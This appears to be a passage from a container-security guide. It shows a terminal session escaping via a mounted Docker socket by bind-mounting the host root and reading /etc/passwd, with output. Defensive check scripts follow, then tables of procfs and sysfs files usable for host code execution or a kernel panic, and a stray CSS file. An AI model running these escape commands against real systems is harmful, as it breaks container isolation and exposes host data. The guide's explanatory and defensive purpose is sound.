root@3ba2c2752b26:/# curl -L --unix-socket /var/run/docker.sock -X POST -H 'Content-Type: application/json' --data-binary '{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash","Image": "ubuntu","Volumes": {"/hostos/": {}},"HostConfig": {"Binds": ["/:/hostos"]}}' http://v1.24/containers/create
{"Id":"8e15f2d344fa7bf9588f82a097e7c506429b936e85bc2a60350a018a7277403f","Warnings":[]}
root@3ba2c2752b26:/# curl --unix-socket /var/run/docker.sock -X POST -H 'Content-Type: application/json' http:/v1.24/containers/8e15f2d344fa7bf9588f82a097e7c506429b936e85bc2a60350a018a7277403f/start

# Run cat /hostos/etc/passwd
root@3ba2c2752b26:/# curl --unix-socket /var/run/docker.sock -X POST -H 'Content-Type: application/json' --data-binary '{"AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Cmd": ["cat", "/hostos/etc/passwd"],"DetachKeys": "ctrl-p,ctrl-q","Privileged": true,"Tty": true}' http:/v1.24/containers/8e15f2d344fa7bf9588f82a097e7c506429b936e85bc2a60350a018a7277403f/exec
{"Id":"0dd4ef3a6b6f63327ef950f9b90d6908006221160f8c2866ed4a8ca4d6e594fb"}
root@3ba2c2752b26:/# curl -L -i --unix-socket /var/run/docker.sock -X POST -H 'Content-Type: application/json' --data-binary '{"Detach": false,"Tty": false}' http://v1.24/exec/0dd4ef3a6b6f63327ef950f9b90d6908006221160f8c2866ed4a8ca4d6e594fb/start --output /tmp/output
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1831    0  1801  100    30  19159    319 --:--:-- --:--:-- --:--:-- 19478

# Confirm that the file contents were retrieved
root@3ba2c2752b26:/# cat /tmp/output
HTTP/1.1 200 OK
Content-Type: application/vnd.docker.raw-stream
Api-Version: 1.40
Docker-Experimental: false
Ostype: linux
Server: Docker/19.03.13 (linux)

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
```
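
A simple first check from inside a container is whether a UNIX socket exists at the usual path. The following is a minimal sketch; the helper name `docker_socket_present` is hypothetical, and the default path is the one used in the example above.

```sh
# Hypothetical helper: succeed if a UNIX socket exists at the given path
# (default: /var/run/docker.sock).
docker_socket_present() {
  [ -S "${1:-/var/run/docker.sock}" ]
}

if docker_socket_present; then
  echo "warning: the Docker socket is reachable from this environment"
fi
```

The socket may be mounted at a different path, so a negative result from the default path does not rule out exposure.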

## procfs and sysfs

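procfs and sysfs expose functionality such as setting kernel parameters, so they can be used to escape to the host or to extract information about the host.  
Docker and LXC mount such files read-only or mask them with `/dev/null`, but the following looks at what happens if they are accessible.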

![readonly mount](./img/procfs-readonly-mount.png)

### procfs

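| File | Description |
|:--------:|:----:|
| `/proc/sys/kernel/core_pattern` | Specifies the name of core files. Because a pipe can be used, it can lead to arbitrary code execution on the host. |
| `/proc/sys/fs/binfmt_misc` | Specifies the interpreter used when executing files with a given extension or magic number. Pointing it at a file inside the container leads to an escape when a matching file is executed on the host. |
| `/proc/sysrq-trigger` | Handles SysRq commands. For example, writing the character `c` to this file from a container triggers a kernel panic on the host. |
| `/proc/sched_debug` | Holds process scheduling information. It includes process names from all namespaces, so host processes are visible as well. |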

Besides the above, there are many other files, such as `/proc/kcore` and `/proc/kallsyms`, that are better kept hidden from containers.
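
The procfs and sysfs paths covered in this section can be checked from inside a container with a short script. The following is a sketch; the helper name `check_path` is hypothetical. A path masked with `/dev/null` will still be reported as writable, so the result is a starting point rather than a verdict.

```sh
# Hypothetical helper: report how a path is accessible from the current process.
check_path() {
  if [ -w "$1" ]; then echo "$1: writable"
  elif [ -r "$1" ]; then echo "$1: readable"
  elif [ -e "$1" ]; then echo "$1: present but not accessible"
  else echo "$1: not present"
  fi
}

# Sensitive paths discussed in this section.
for p in /proc/sys/kernel/core_pattern /proc/sys/fs/binfmt_misc/register \
         /proc/sysrq-trigger /proc/sched_debug /proc/kcore /proc/kallsyms \
         /sys/kernel/uevent_helper /sys/kernel/vmcoreinfo; do
  check_path "$p"
done
```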

### sysfs

| File | Description |
|:--------:|:----:|
| `/sys/kernel/uevent_helper` | Specifies the program to run when a uevent occurs. Triggering a uevent from the container can lead to arbitrary code execution on the host. |
| `/sys/kernel/vmcoreinfo` | Can leak kernel addresses. |


================================================
FILE: source/styles/website.css
================================================
.markdown-section blockquote {
    width: 100%;
    border-left: 4px solid #3884ff;
    border-radius: 0.3rem;
}

blockquote blockquote {
    padding-right: 0;
}